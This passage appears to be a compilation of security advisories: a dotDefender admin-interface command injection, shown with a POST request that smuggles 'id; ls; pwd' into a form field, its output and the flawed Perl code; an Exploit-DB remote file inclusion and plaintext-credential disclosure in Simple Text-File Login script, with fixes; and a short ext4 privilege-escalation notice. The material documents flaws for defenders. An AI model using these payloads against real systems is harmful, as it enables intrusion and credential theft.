User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: https://172.16.159.132/dotDefender/index.cgi
Authorization: Basic YWRtaW46
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 95

sitename=dotdefeater&deletesitename=dotdefeater;id;ls -al ../;pwd;&action=deletesite&linenum=15

--------------------/Response/--------------------
[...]
uid=33(www-data) gid=33(www-data) groups=33(www-data)
total 12
drwxr-xr-x 3 root     root 4096 Nov 23 02:37 .
drwxr-xr-x 9 root     root 4096 Nov 23 02:37 ..
drwxr-xr-x 7 www-data 99   4096 Nov 23 07:11 admin
/usr/local/APPCure-full/lib/admin
uid=33(www-data) gid=33(www-data) groups=33(www-data)
total 12
drwxr-xr-x 3 root     root 4096 Nov 23 02:37 .
drwxr-xr-x 9 root     root 4096 Nov 23 02:37 ..
drwxr-xr-x 7 www-data 99   4096 Nov 23 07:11 admin
/usr/local/APPCure-full/lib/admin
uid=33(www-data) gid=33(www-data) groups=33(www-data)
total 12
drwxr-xr-x 3 root     root 4096 Nov 23 02:37 .
drwxr-xr-x 9 root     root 4096 Nov 23 02:37 ..
drwxr-xr-x 7 www-data 99   4096 Nov 23 07:11 admin
/usr/local/APPCure-full/lib/admin
uid=33(www-data) gid=33(www-data) groups=33(www-data)
total 12
drwxr-xr-x 3 root     root 4096 Nov 23 02:37 .
drwxr-xr-x 9 root     root 4096 Nov 23 02:37 ..
drwxr-xr-x 7 www-data 99   4096 Nov 23 07:11 admin
/usr/local/APPCure-full/lib/admin
[...]

Affected Code
=============

The affected code (perl) is in index1.cgi of the admin interface:

311
312     }elsif($action eq "deletesite") { # delete site
313         $deletesitename=$postFields{"deletesitename"};
314         $dots_index = index($deletesitename,"%3A");
315
316         if($dots_index != -1 ) {
317             $site_a_part= substr($deletesitename,0,$dots_index);
318             $site_b_part= substr($deletesitename,$dots_index+3,length($deletesitename)-$dots_index-2);
319             $site_a_part=&cleanIt($site_a_part);
320             $site_b_part=&cleanIt($site_b_part);
321             $deletesitename = $site_a_part.":".$site_b_part;
322         }
323
324         $linenum=$postFields{'linenum'};
325         applyDbAudit($action);
326         &delline($linenum,2);
327         cleanSiteFingerPrints($deletesitename);
328
329         &deleteSiteConf($deletesitename);
330         $site_params="$CTMP_DIR/".$deletesitename."_params";
331         system("rm -f $site_params");

And applicure-lib2.pl:

13  sub cleanIt {
14      my($param,$type)=@_;
15
16      $param =~ s/%([a-fA-F0-9]{2})/pack "H2", $1/eg;
17      if ($type eq 'any') {
18      } elsif ($type eq 'filter') {
19          $param =~ s/\+/" "/eg;
20      } elsif ($type eq 'path') {
21          $param = un_urlize($param);
22          #$param =~ s/([^A-Za-z0-9\-_.\/~'])//g;
23          #$param =~ s/\+/" "/eg;
24      } else {
25          $param =~ s/([^A-Za-z0-9\-_.~'])//g;
26      }
27      return $param;
28  }

Here one can see that certain shell control characters are not protected by the call to cleanIt. Thus an attacker can gain control of the system call in line 331 of index1.cgi.
6.3 Simple Text-File Login script 1.0.6 (DD/RFI) Multiple Vulnerabilities
Source: http://www.exploit-db.com/exploits/7444
# Title: Simple Text-File Login script 1.0.6 (DD/RFI) Multiple Vulnerabilities
# EDB-ID: 7444
# CVE-ID: (2008-5762)
# OSVDB-ID: (50712)
# Author: Osirys
# Published: 2008-12-14
# Verified: yes

[START]

#########################################################################

[0x01] Information:

Script        : Simple Text-File Login script 1.0.6
Download      : http://www.hotscripts.com/jump.php?listing_id=36777&jump_type=1
Vulnerability : Remote File Inclusion / Sensitive Data Disclosure
Author        : Osirys
Contact       : osirys[at]live[dot]it
Notes         : Proud to be Italian
Greets        : XaDoS, x0r, emgent, Jay

Notes :*
* The name of this login system is Simple Text-File Login script, so we can already understand that this script will use a .txt file to do its job. So it's as if the coder didn't think that a login system like this is vulnerable. Weird! Anyway, it's vulnerable to Remote File Inclusion also, here we are!

#########################################################################

[0x02] Bug: [Remote File Inclusion]
######

Bugged file is: /[path]/slogin_lib.inc.php

[CODE]
90. if (!isset ($slogin_path)) {
91.     $slogin_path = "";
92. }
[/CODE]

If $slogin_path is not given, it becomes a null variable. Scrolling down the source code, you can see an include of that variable everywhere. Just one of the few vulnerable includes:

[CODE]
include_once ($slogin_path . "header.inc.php");
[/CODE]

FIX: Just declare $slogin_path.

An example of a bugged inclusion in the source is this:

[CODE]
include_once ($slogin_path . "header.inc.php");
[/CODE]

The header.inc.php file, like all the files of this CMS, is in the same dir as slogin_lib.inc.php, so a fix could be just to include the file without the variable, which should be null because all the files are in the same dir.

[CODE]
include_once ("header.inc.php"); # <-- This is a secure include.
[/CODE]

[!] EXPLOIT: /[path]/slogin_lib.inc.php?slogin_path=[remote_txt_shell]

#########################################################################

[0x03] Bug: [Sensitive Data Disclosure]
######

* As I already said, this is not a real bug, because it is the intention of the author to use a .txt file as login storage. But it's weird, it's insecure! Maybe he just sees the goodness of people (hehe xD)

In this login system, sensitive data like username and password are stored in a local text file, so we can get sensitive information just by going to this txt file. The name of this file is set in slogin_lib.inc.php. By default it is: slog_users.txt

[!] EXPLOIT: /[path]/slog_users.txt

#########################################################################

[/END]

# milw0rm.com [2008-12-14]
6.5 Linux Kernel Ext4 'move extents' ioctl Local Privilege Escalation Vulnerability
Source: http://www.securityfocus.com/bid/37277/exploit
Linux kernel is prone to a local privilege-escalation vulnerability because the software fails to verify access permissions. Exploits may allow attackers to execute arbitrary code with kernel-level privileges and launch other attacks. Successful exploits will result in the complete compromise of affected computers.